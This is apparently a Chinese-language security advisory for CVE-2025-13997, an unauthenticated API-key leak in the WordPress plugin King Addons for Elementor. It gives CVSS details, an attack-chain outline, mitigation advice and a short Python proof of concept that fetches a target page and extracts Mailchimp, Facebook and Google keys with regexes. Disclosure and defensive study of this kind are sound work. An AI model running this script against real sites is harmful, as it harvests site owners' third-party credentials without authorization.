CVE-2025-13997 CVSS 5.3 中危

CVE-2025-13997 WordPress King Addons插件信息泄露漏洞

披露日期: 2026-03-23

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-13997

漏洞类型

信息泄露

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

King Addons for Elementor (WordPress Plugin)

漏洞概述

WordPress插件“King Addons for Elementor”在所有版本（包括51.1.49）中存在一个安全漏洞。由于该插件通过`render_full_form`函数将API密钥直接添加到HTML源代码中，导致未经身份验证的攻击者可以提取网站的Mailchimp、Facebook和Google API密钥及密钥。此漏洞需要安装Premium许可证才会触发，且攻击者无需任何交互即可远程利用，造成敏感信息泄露风险。

技术细节

该漏洞源于WordPress插件“King Addons for Elementor”在处理表单渲染时的逻辑缺陷。具体而言，在`render_full_form`函数中，插件将用于集成的第三方服务（如Mailchimp、Facebook、Google）的API密钥和秘密密钥直接硬编码或输出到了网页的HTML源代码中。由于这是服务器端渲染的一部分，当用户访问相关页面时，这些敏感信息会随响应返回给客户端。攻击者无需具备任何账户权限或进行用户交互，只需向受影响网站发送简单的HTTP请求，查看返回的HTML源代码，即可搜索并提取出这些高价值的API凭证。需要注意的是，该漏洞仅在安装了Premium许可证的情况下存在。成功利用此漏洞可能导致攻击者利用泄露的API密钥访问受害者的第三方服务账户，进一步造成数据滥用或服务劫持。

攻击链分析

STEP 1

侦察

攻击者识别出目标WordPress站点使用了King Addons for Elementor插件，且存在Premium功能。

STEP 2

访问与抓取

攻击者向包含该插件小工具的页面发送HTTP GET请求，获取完整的HTML响应内容。

STEP 3

信息提取

攻击者解析HTML源代码，利用正则表达式或字符串搜索定位render_full_form函数输出的API密钥。

STEP 4

滥用凭证

攻击者使用获取到的Mailchimp、Facebook或Google API密钥访问相应的第三方服务接口。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import re

def check_vulnerability(url):
    """
    PoC to check for CVE-2025-13997.
    Fetches the HTML source and looks for exposed API keys.
    """
    try:
        response = requests.get(url, timeout=10)
        if response.status_code == 200:
            content = response.text
            # Common patterns for API keys in the source code
            patterns = {
                'Mailchimp': r'mailchimp[_-]?api[_-]?key["\']?\s*[:=]\s*["\']?([a-zA-Z0-9-]+)',
                'Facebook': r'fb[_-]?app[_-]?secret["\']?\s*[:=]\s*["\']?([a-zA-Z0-9]+)',
                'Google': r'google[_-]?api[_-]?key["\']?\s*[:=]\s*["\']?([a-zA-Z0-9-_]+)'
            }
            
            found = False
            for service, pattern in patterns.items():
                match = re.search(pattern, content, re.IGNORECASE)
                if match:
                    print(f"[+] Potential {service} API Key found: {match.group(1)}")
                    found = True
            
            if not found:
                print("[-] No exposed API keys detected in the HTML source.")
        else:
            print(f"[-] HTTP Error: {response.status_code}")
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    target_url = "http://target-site.com/page-with-form"
    check_vulnerability(target_url)

影响范围

King Addons for Elementor <= 51.1.49

防御指南

临时缓解措施

在未升级插件前，建议暂时禁用King Addons插件中的登录/注册表单功能或移除相关的Premium小工具，以防止API密钥继续暴露。同时，应尽快审查服务器日志，确认是否有可疑的API调用记录。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表